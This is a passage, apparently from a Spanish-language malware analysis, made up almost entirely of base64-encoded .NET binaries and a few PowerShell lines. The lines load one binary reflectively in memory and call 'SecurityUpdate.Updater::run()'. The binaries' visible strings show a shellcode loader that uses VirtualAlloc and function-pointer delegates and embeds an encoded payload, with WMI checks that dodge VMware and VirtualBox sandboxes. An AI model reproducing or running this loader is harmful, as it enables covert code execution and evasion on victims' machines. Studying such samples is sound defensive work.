AEcARQAwAHAAUgB6AHoAbQBEAEsAMgBrADgAeQBiADYAMABwAFMAVwArAFYAVQArAFIARwA1ADUAOAA0AHgAaABPAFcAZQBxAFkANABsAFMAcwA1AGIAYgBYAEwAdgB4AGwAQgBxAEsAZAB6ADUAVgBMAEUAZABIAHUAdAAwAFMAaQBVAHQAagBFAEcASABBAEgAbwBOADgAMgBZADEAWABQAHcANQAvAFkARQBtADgASAB2AFQAZgBWAEMAcQBFAEoAUQBnADEAZAA2AFgAbwBBAEgAOAB6AGUAbQB3AEgANgBOAHcAMQBwAC8AVABrADYASAAwAC8ARABLAFEAcQA1AGEAQwBsADMASgBXADkAZgBGAGkALwBPAGEAcAA2AHQANgAzAEQAUABTADAAeQBhAHcAQwBMAGoAcwBKAFAAZwA5AHAAYgBrADAAdABJAHYAUwBkAHcASgBLAHcAVABSADEAcwBuAGUAcgBKAHcAMwBRAFYAMQAxAEkAegBWAEMAbABWAGUATQBCAGsAeAByADkAZQBqAHYAbgBmAHEATAAyAEgAUAAwADUAZwBwAGkAMQBnAHkASAB6AHQAdAA1AGoALwBmAHAAMABlAG8ANQA3AFAATwA3ADkASAB5AGwATwBqAFMATgBMAHoAMQA2AGoAcwA3AG0ANABPAEwAVAAwAG4AcwBRAHYAYwBzAGgARABLAGoAdgBPAHEAUwBnAFgAWABlAHEAWgBwAFQAMwBiAGYAYgBoAFoAYgBMACsAQgBEAHEAWQBkAE4AWABrAEwAZwBNAGoAQwBBAHYATwB2AGgAcgBlAHoAcQB2AEoATwBsAGoAdgBMAGwALwBhAEcAdQBDAFkAZQB5AEIAbABmAFEAdQBkADQAbgBrADgAawBNAFEAUABKAFYAeABlAHMAZwBxAHQANQBKAGkAZgBDAFQAUgBOAHIARQBzADUAYgBvAE8AMwBxAHIAWgBCAGYAbwBSAG0ARgBFAGIAdQBOAGIAYwBLAE4AYQBKAEcANwBCAGwAUgBzAEoAQwA2AG4AdwBZAGQAbQBrAFIAVgBHAGUAZAAvAHAAVwBqAEcAVABRAHcAUABVAEEARQBSAHoAYgBTAG8ASQBWAE4ATAAzAGcAcgBOAGMAVwAxADcAUwBPAGYAbABlAHMAeQArAGkAeAB0AHgANwBIAEkAYgBOAHQAcwBNAGIAaABpAGcANgBwAGEAdABSAGsAMwA1ADMATQBhADAAdQBkADgARABsAHIAaQBNAE4AWQBNAFUARwArAHkAcABWAEUATQB4AG4AOQBYAHoAYwAzAEQASwBoAHMARgBLAE8AMgA3AEoAbgB3AGcAOABVAHQAaABRADIAWgAzACsAYQBOAEYAeQBrAEwAeABFAFIASABtAE4AYQBSAFoAcABSAEoAKwBSAFgAMQBNAFcAdgA3AGkAbAA1AFcAdABqADIASQBhAHQARgA2AGwASQBzAEIAdQBtADkATgBOADUAOQBmAFQANgBPAFYAbQBMAGcAbQBDAGUAbwBXAHUASQBJAEIAagBUAHIAVAB4AFYALwAvAEkAMwB2AG4AVgAwAHcAdgBnAFcAMQB2AEkAVwAzAGQAagBRAFQAdwBXAG4AYgBZADUAagBWAHAAOQBkAEkAWQB2AHoAYgBUAEkAdgBrAFQANgBQAGkAZABkADYATQBwAGMAcQBzAEYAaAAwAFAAeABnAFgASQBOAEMAZwBkAHAASQBZADYATABmAG0AdABPAEcAVQBRAHIAUgA0AFkAawBjAEMAZwBXAHkAMAB6AHYAQwB1AEIAKwB2AFcAZAB5AGMAegBNAGsAcABaAHgAKwBlAFkAcwBQAG8AbgBYAHgAcQBQAHUAWgBNAEYANABXAGMASQA5AEgARQA4ADQAZwBWAGMAQgBzAE8ANQBJAGUAaABsAE0ASAB5ADEAdgBlAEkAWABvAGUAUwBHADYAWABRAGcAbgB5ADEANQBLAHYARABMAFkAZgB1AFMAZABFAHMAMQBZADcARQB6AC8AagBuAGEAZQBVAFoAQwBHAHMATQByAGYAQQArAHQANABCAHkAZABBAFMAVgBVAG8ASwBIAHcASgBPAHcAcABjADUAeABJAFoAbQBrAHYAbwBmAEYAegArAGYAQwBYAFIAMgA0AHIAZgBEAGQAUgBoAGYATgBJAG0AZgBqAFQANQAwAGgARwBJAHIAcwBIAGoAegB4ADYAdgBnAE8AMwBoAGUAWQBjAG0ASABQAGYAdwBIAFYAZABYAG0ARgA4AEMAZABxAHEAcQBBAGwATgAvADQAKwAvAHUAcABkAE8AOAA0AHQARQB3ADEARQBpAGIAdgBhAEoAQgAvAGwAdgBGAGMANABiAFIAaQBoAFcAcwAyAFoASABJAHMAVwB0ADQAYgB1AEsAYwBFAGwANgB2AGsAMgBhAG4AZwBvADUAOABmAEgAYQBtAFAAVQBPAEkAWAByAEEAbwBmAEUANwAyADQAZQBoAHkAaABWAEIASQBzAEIASQBRADkASQBKAE8ASgA1AFEAMAB2AHcATABJAFgAMABNADQAVgBMAGYAUABxAGgAdABLAEkAQgBSAFUAbQBKAFoAYQBaAEQAbwBiAEkAOQBuADEATwAzAGYAQwBnAGcAQgA3AGkAcgBDAEcAWABOAGcAZgB2AHEASABOAHMARgBJAFEANgB6AGsARwBzAGUAcQArAFIARAAyAHoAVABlACsAaQBuAFIAZQBCAG8ANwBWAGoAdwB0AEMAWQBIAGkAWABUAEgAUQBKAFgAbQBMADkAKwBuAE8AWQBBAEgARwBOAGoAagBwAEYAVABrADYANQByAHIALwBHAEkAWgBEADQAagAyAHcANQBsAGUATABlADEAMABSAFoAbwBqAGEAYgB3AGcASwBaAG0AdAA4AFYARQBFAGYANgAwAEkAdwBGAGgAMgBOADgASABZACsAagB5AFkAWQBaAFIANQBvAGwAZwB6AGUASwBNAGYARQB2AEIAcwA5AEUAcwBvAFMAYgB6AEsANgBzADAAMQBaAFoAMQBjADIAdABmAC8AUwBaACsAbAAvADUAbQBrAFoAZQBIAGYASQBXADcATABqAFQAdQBYAEkAdgBrAGQAcQArAFYAaQBzADUAbgBJAHAAMABoAGQAVwBGADcAcABJAG0AYQBCAFAALwA5ADcAUwBwADcAdwBQADMAbQA1AEkANwBlAFAAVwBqAEUAOQAvAFkASQAwACsAawBJAG0ATQBhAFgASQBoAGkAbwAxAG8AVQA4AHAAdgBTAEEAawBGAGEANgB3AEIAQgBnAFcAbwBDAEgANABCAFYAMABVAEgAQgBRAGcAYQBBAFEAWQBGAHEAQwB0AGsAYgBkAGIASgBCAHcAVQBvAE8AWABFAEYAUwB3AHcAPQA9AABFUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQAAGU0AYQBuAHUAZgBhAGMAdAB1AHIAZQByAAArbQBpAGMAcgBvAHMAbwBm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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()
Tomemos la cadena codificada en Base64 y la decodifiquémosla a un archivo:
$ echo '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iQCvAxoAkQCvAwYA2QB/AiwA4QA6AzIA6QDKBDUA8QBsAD4A6QBgA0UAoQCvAxAAoQByBFwAqQChA2EAsQCtBGYAuQDlAmsAmQCQAnAACQF+A3AACQHPBHQACQGKBHAACQEdBHoAsQDBBH8AEQGaAAYAmQCvAwYAJwCDAEICLgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJ8BLgAzAJ8BLgA7AJ8BLgBDAJEBLgBLAKUBLgBTAJ8BLgBbAJ8BLgBjAL0BLgBrAOcBLgBzAPQBCAAGAJUAIAAkAE4AwgJBAQMAGAABAEEBBQAsAAEABIAAAAEAAAAAAAAAAAAAAAAA3AIAAAQAAAAAAAAAAAAAAIMACgAAAAAABAAAAAAAAAAAAAAAjACbBAAAAAADAAIAAAAAPE1vZHVsZT4AbXNjb3JsaWIAZnVuYwBWaXJ0dWFsQWxsb2MAbWV0aG9kAFZpcnR1YWxGcmVlAEVuZEludm9rZQBCZWdpbkludm9rZQBJRGlzcG9zYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBkd0ZyZWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBTZWN1cml0eVVwZGF0ZQBNdWx0aWNhc3REZWxlZ2F0ZQBHdWlkQXR0cmlidXRlAFVudmVyaWZpYWJsZUNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1NpemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sATWFyc2hhbABpc1ZpcnR1YWwAa2VybmVsMzIuZGxsAHRlc3RfZGxsLmRsbAB0ZXN0X2RsbABnZXRfSXRlbQBTeXN0ZW0AYm9vbQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBSdW4AWmVybwBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZXIAVXBkYXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBUb0xvd2VyAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAEdldEVudW1lcmF0b3IALmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBDb250YWlucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAbHBBZGRyZXNzAE1hbmFnZW1lbnRCYXNlT2JqZWN0AG9iamVjdABmbFByb3RlY3QAR2V0AElBc3luY1Jlc3VsdAByZXN1bHQAVG9VcHBlckludmFyaWFudABTeXN0ZW0uTWFuYWdlbWVudABnZXRfQ3VycmVudABDb252ZXJ0AE1vdmVOZXh0AENvcHkAb3BfRXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AAAAkXk2AHcARABvAFkAdwBZAEEAQQBPAHMAQQBZAEQASQBYAEcAcwBmAEIAUgBnAGIAWgBHADgARQAvAGsAdwBBAEEAVQBBAEIARgBNAEIAUQBPAFIAUQBJAFUARAB1AEwAMgBKADgAdwBxADgAOQBNAHoARwBSADgAZgBuADgAdwA3AGUARgB2AFoAeAArAHkASgBjAEEAYQBDAEsAZgAwAGwAcABXAFYAQgBVADEATgBUADAAdAByAE0AeABZAEIANgBiAEcARgA3AFkAZABmAGsATgBCAEQAaAAxAHcAdQBlAEIATAB2AEYASQBmADYAUQBxAG0AegB1AEIASABxAFEAbwByAGgASABaADMAdABQAE8AaQBQAFMAYwBpAEYAcwA4AFUAWQBPAGwALwA2ADIASgBtAEsAbABIAHcAOAA1AGUATQBsAG8ATgBRAFUAUgAzAC8AWgBSADgAeABQAFoANQBnACsASwB3ADcANgBhAEYAZQBNADcAdQBKAG4AdABaAGQAawBjAHkAdQBYAEwANAAvADgAaQBrAEkARgBYAGcAcAAxAFUAYgBnAEYAMQBIAHkAaQAwAEYAUQBoAHIAVABLAFMAOQBIAGwAaABQAEYAZgBJADMASABWADMATQBtAEEAdQA3AEIAbgBuADUAdQAzAG0AcgB6AE8ARgBPAEYANQBYAGUAWQArAGwAQwBOAEkAaABLAFcAeAB4AHcATgBZAEIAaABWAHAAMgBVAFcAdABHAFQAeQAzADYAUAA3ADEARgBLAGMAVwBNAGYAaABCAGUAWAAwAHgANgBOAG4AdwB2AEYAdABqADYAQwArAFAAdgBsAEEAUgBEAFMAZgBjAGsAWQBTAFIATABNAFoAbQBsAGgAdwB4AFMAYgAwAFYAcwB6AGEAdABMAEMASgA5AHIAZwBWAGwAUgBYAGcAeABXAEsAMABBAGIAaQB0AG8AMABRAFUATwAyAFUAOQA2AHYAcABBAG4AMwBYAEsAVQAxAC8AagBtAGQAdQBFAHkAawBxADQAcwBtAEUANABQAEsASwBtAGIAdgBhAGIASwA5AEwAeQB6AFAAcgBQADMAOQBYAGIAegB1AGYAVQBpAEQAQwBlADkAYgBEAHYAOQBvAFkATgBkAEUATwB4AFgAcAA0AGwASABxAHQAagByAFoAdQBQAHMANgBQAGEAbQBBAGEAUAB5ADIAVgB0AFAAQgBMAHAAVwBYAGwAUgBPADMAOABoAHgAcwByAG4AWAB0AEgAbgAyAGEAbgBsAGYASgBCAFkAbABwAEMAbgBDAFIASgBQAHcAMgB2AE8AVABOAGgANABKAEYAeAA2AGUATQBWAGgAZABYAEQAegBtAEQAQwBlAFQAUABOAE4ASQA0ADQATQBsAC8ASwBQAEsAZAAwAFoAawBaAHYAbgB3AFAANAA3ADkANgAxAHYAUwBpAFoAaAA4AFYAaQBHAEUAbwBwAC8ASQByAHoAQgBWAEoAbwBhAGwAYgBLAFgAKwBZAEgATwBJADcAdgBNAG4ASwBHAFMAVAA0AFUAdABsAHYANgBhAEIAMABuAE4AOAA0AGQASgBWAFEAdgB1AC8AQwBHAEsASgBNAFAAVABxAEIAaQBPAEQAcwBlAGoAQQBiADQAOAByADAAbwBBAFQAcwBsAHMAagBrAFoAMQAxAFkAdAAyAC8AYgByAGIAMgBnAGEAbgB0ADkAVwBkAGMAawBVAHAATABpAFAANwBCAEUAQQBtAGMAMwBUAFYAMwBiAFAAQgB4ADUASgBNAHMASwA4AGQANgB2AFQATABqAEkAZgBNAGMATAA5AC8AWgB4AHIAaAAvACsAcgBLAEUAVAB4AE4AYgBqAGYAdQBxAFQAeQA5AHoALwAxAGEALwBWAEgAMgBJAEkAQgBWAFEAZgBTAGgAVABKAG4AMgBxAHEASAA3AHoAMgBhAFcAbwB1AGYAbgBHAFEAUABQAEkATgA4AHAATAA1AEEAYgBHADkASQBVAG8AWgBVADUAKwBLAEIAbABSAE8AaQBCAEYAVgB1AEEAcwB2AGwAMAA0AGcAUQBzADkAUgBlAEUAVQBHAHQANgBYAFoAdAB2AFAANABtAEEAZQAwAHQAbwAzAEYAeAAwAHUATgBEAEcAbABkAGwAegBNAFkAWABsAG4AVwBpADYAYgBTAEUAQQBuAGoAKwBaADIAegAwADcAZQBHADgANwBUAHMATgAzAGQAYgBRADMAeQAwAG4ATwB1ADUAdgB5AC8AeQBSAGUAWQBuAHIARgBpAE4ASwA2AGQAbAAzADEAVwB1AGMAKwAvAFUAQwBLAE4AcwBlAHEATwAwADEARwBJACsATgBQADUAbgB6AFkAbABWAC8AOAB6AHYANgBOAC8AcABuAG0AYwBOADIAOABBAGIAcAB1ADIASQBwAEoAZQA2ADYAagBXAFkASwBCAHUANQBlAFIAWABiAEcAawBlAE0AYwBUAFIAbgBuAGgAMwBXAEcARQAwAHAAUgB6AHoAbQBEAEsAMgBrADgAeQBiADYAMABwAFMAVwArAFYAVQArAFIARwA1ADUAOAA0AHgAaABPAFcAZQBxAFkANABsAFMAcwA1AGIAYgBYAEwAdgB4AGwAQgBxAEsAZAB6ADUAVgBMAEUAZABIAHUAdAAwAFMAaQBVAHQAagBFAEcASABBAEgAbwBOADgAMgBZADEAWABQAHcANQAvAFkARQBtADgASAB2AFQAZgBWAEMAcQBFAEoAUQBnADEAZAA2AFgAbwBBAEgAOAB6AGUAbQB3AEgANgBOAHcAMQBwAC8AVABrADYASAAwAC8ARABLAFEAcQA1AGEAQwBsADMASgBXADkAZgBGAGkALwBPAGEAcAA2AHQANgAzAEQAUABTADAAeQBhAHcAQwBMAGoAcwBKAFAAZwA5AHAAYgBrADAAdABJAHYAUwBkAHcASgBLAHcAVABSADEAcwBuAGUAcgBKAHcAMwBRAFYAMQAxAEkAegBWAEMAbABWAGUATQBCAGsAeAByADkAZQBqAHYAbgBmAHEATAAyAEgAUAAwADUAZwBwAGkAMQBnAHkASAB6AHQAdAA1AGoALwBmAHAAMABlAG8ANQA3AFAATwA3ADkASAB5AGwATwBqAFMATgBMAHoAMQA2AGoAcwA3AG0ANABPAEwAVAAwAG4AcwBRAHYAYwBzAGgARABLAGoAdgBPAHEAUwBnAFgAWABlAHEAWgBwAFQAMwBiAGYAYgBoAFoAYgBMACsAQgBEAHEAWQBkAE4AWABrAEwAZwBNAGoAQwBBAHYATwB2AGgAcgBlAHoAcQB2AEoATwBsAGoAdgBMAGwALwBhAEcAdQBDAFkAZQB5AEIAbABmAFEAdQBkADQAbgBrADgAawBNAFEAUABKAFYAeABlAHMAZwBxAHQANQBKAGkAZgBDAFQAUgBOAHIARQBzADUAYgBvAE8AMwBxAHIAWgBCAGYAbwBSAG0ARgBFAGIAdQBOAGIAYwBLAE4AYQBKAEcANwBCAGwAUgBzAEoAQwA2AG4AdwBZAGQAbQBrAFIAVgBHAGUAZAAvAHAAVwBqAEcAVABRAHcAUABVAEEARQBSAHoAYgBTAG8ASQBWAE4ATAAzAGcAcgBOAGMAVwAxADcAUwBPAGYAbABlAHMAeQArAGkAeAB0AHgANwBIAEkAYgBOAHQAcwBNAGIAaABpAGcANgBwAGEAdABSAGsAMwA1ADMATQBhADAAdQBkADgARABsAHIAaQBNAE4AWQBNAFUARwArAHkAcABWAEUATQB4AG4AOQBYAHoAYwAzAEQASwBoAHMARgBLAE8AMgA3AEoAbgB3AGcAOABVAHQAaABRADIAWgAzACsAYQBOAEYAeQBrAEwAeABFAFIASABtAE4AYQBSAFoAcABSAEoAKwBSAFgAMQBNAFcAdgA3AGkAbAA1AFcAdABqADIASQBhAHQARgA2AGwASQBzAEIAdQBtADkATgBOADUAOQBmAFQANgBPAFYAbQBMAGcAbQBDAGUAbwBXAHUASQBJAEIAagBUAHIAVAB4AFYALwAvAEkAMwB2AG4AVgAwAHcAdgBnAFcAMQB2AEkAVwAzAGQAagBRAFQAdwBXAG4AYgBZADUAagBWAHAAOQBkAEkAWQB2AHoAYgBUAEkAdgBrAFQANgBQAGkAZABkADYATQBwAGMAcQBzAEYAaAAwAFAAeABnAFgASQBOAEMAZwBkAHAASQBZADYATABmAG0AdABPAEcAVQBRAHIAUgA0AFkAawBjAEMAZwBXAHkAMAB6AHYAQwB1AEIAKwB2AFcAZAB5AGMAegBNAGsAcABaAHgAKwBlAFkAcwBQAG8AbgBYAHgAcQBQAHUAWgBNAEYANABXAGMASQA5AEgARQA4ADQAZwBWAGMAQgBzAE8ANQBJAGUAaABsAE0ASAB5ADEAdgBlAEkAWABvAGUAUwBHADYAWABRAGcAbgB5ADEANQBLAHYARABMAFkAZgB1AFMAZABFAHMAMQBZADcARQB6AC8AagBuAGEAZQBVAFoAQwBHAHMATQByAGYAQQArAHQANABCAHkAZABBAFMAVgBVAG8ASwBIAHcASgBPAHcAcABjA